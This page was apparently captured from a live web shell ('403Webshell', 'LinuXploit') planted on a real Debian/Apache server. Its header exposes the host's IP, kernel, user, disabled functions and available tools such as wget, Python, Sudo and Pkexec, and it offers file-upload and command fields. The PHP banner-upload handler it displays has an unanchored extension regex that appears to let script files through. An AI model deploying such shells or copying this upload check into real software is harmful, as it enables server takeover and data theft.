403Webshell
Server IP : 80.241.246.6  /  Your IP : 216.73.216.188
Web Server : Apache/2.4.25 (Debian)
System : Linux kharagauli 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
User : www-data ( 33)
PHP Version : 7.0.33-0+deb9u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/kharagauli1/moduls/banners/site/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/kharagauli1/moduls/banners/site/post.php
<?php
/*
@author suxoza <suxoza@gmail.com>
*/
if(realpath(__FILE__) == realpath($_SERVER['SCRIPT_FILENAME']))die("__main__");
    
//$_->pre($_POST);
//$_->pre($_FILES);

$iterator = 0;

$select = $_->select("*","banners","big");
$select = (isset($select['body']))?$select['body']:'';

foreach($_POST as $key => $value){
    $boolas = false;
    if(!isset($_POST['t_name_'.$iterator]))continue;
    
        if(isset($_POST['_id_'.$iterator])){
             $boolas = true;
             $id = $_->clier($_POST['_id_'.$iterator]);
             $file = ($select)?$_->return_current_element($select,$id)['src']:'';
        }else
            $file = '';
            
    
    if(isset($_FILES['file_'.$iterator]) && $_FILES['file_'.$iterator]['name'] && preg_match('/[.](jpg)|(JPG)|(jpeg)|(JPEG)|(gif)|(GIF)|(png)|(PNG)|(swf)|(SWF)$/',$_FILES['file_'.$iterator]['name'])){
        $file_name = time().'_'.$iterator.'_'.str_replace(' ','',substr($_FILES['file_'.$iterator]['name'],-4));
        if(move_uploaded_file($_FILES['file_'.$iterator]['tmp_name'], $_->_dir.'img/banners/banner/'.$file_name)){
            if($boolas && $file)@unlink($_->_dir.'img/banners/banner/'.$file);
            $file = $file_name;
        }    
     }    
        $window = ($_POST['new_window_'.$iterator])?1:0;
        $insert = ['name','src','url','date','new_window','width','height'];
        $values = [$_->clier($_POST['t_name_'.$iterator]),
                   $file,$_->clier($_POST['url_'.$iterator]),time(),
                   $window,$_->clier($_POST['width_'.$iterator]),
                   $_->clier($_POST['height_'.$iterator])];

            for($i = 0; $i < count($_->language_config); $i++){
                    $insert[] = "title_".$_->language_config[$i];
                    $insert[] = "alt_".$_->language_config[$i];
                    $values[] = $_->clier($_POST['t_title_'.$_->language_config[$i].'_'.$iterator]);
                    $values[] = $_->clier($_POST['t_alt_'.$_->language_config[$i].'_'.$iterator]);
             }
     
         if($boolas){
             array_splice($insert, 3,1);
             array_splice($values, 3,1);
             $_->update("banners",[$insert,$values,["id",$id]]);
         }else
             $_->insert('banners',[$insert,$values]); 
             
//         $_->pre($insert);
//         $_->pre($values);

    
    $iterator++;
}

header("Location:".$_SERVER['HTTP_REFERER']."#changed");
    die;


     //$select_body = $_->select("*","body","small",["page_id",$select_menu['id']]);
    //$_->pre($select_menu);
    //$_->pre($select_body);
  
    $_time = 0;
    if($_POST['time']){
        list($day,$month,$year) = explode('/',$_->clier($_POST['time']));
        $_time = mktime(0, 0, 0, $month, $day, $year);
    }


    $insert = ['page_id','logo','attributes','page_date','date_modify'];
    $value = [$select_menu['id'],'','',$_time,time()];
    for($i = 0; $i < count($_->language_config); $i++){
           $insert[] = "name_".$_->language_config[$i];
           $insert[] = "body_".$_->language_config[$i];
           $value[] = $_->clier($_POST['name_'.$_->language_config[$i]]);
           $value[] = $_->clier($_POST['body_'.$_->language_config[$i]]);
    }
  
    $navig_name = '/'.$url[1].'/'.$url[2];
    try{
        if(in_array('more', $url)){
            if(!isset($url[4]))throw new Exception("bad uri format!!!"); 
              if($_->update("body",[$insert,$value,["id",$url[4]]]))
                   header("Location:".location($_POST['added_params'],$navig_name,$_).$_COOKIE['location_href_menu']."/changed/");
               else
                   die("update error!!!!!");

        }elseif(in_array('new', $url)){
              $insert[] = "date";
              $value[]  = time();
              if($_->insert("body",[$insert,$value]))
                   header("Location:".location($_POST['added_params'],$navig_name,$_).$_COOKIE['location_href_menu']."/added/");
               else
                   die("insert error!!!!!");

        }else die("unconv uri!!!");
      
    }catch(Exception $exc) {
          die($exc->getMessage());
    }    
    
    
    function location($a,$navig_name,$_){
        if(!$a)return $_SERVER['HTTP_REFERER'];
        elseif($a == 1)return $navig_name;
        elseif($a == 2)return $navig_name.'/more/'.$_->con->lastInsertId();
    }



?>

Youez - 2016 - github.com/yon3zu
LinuXploit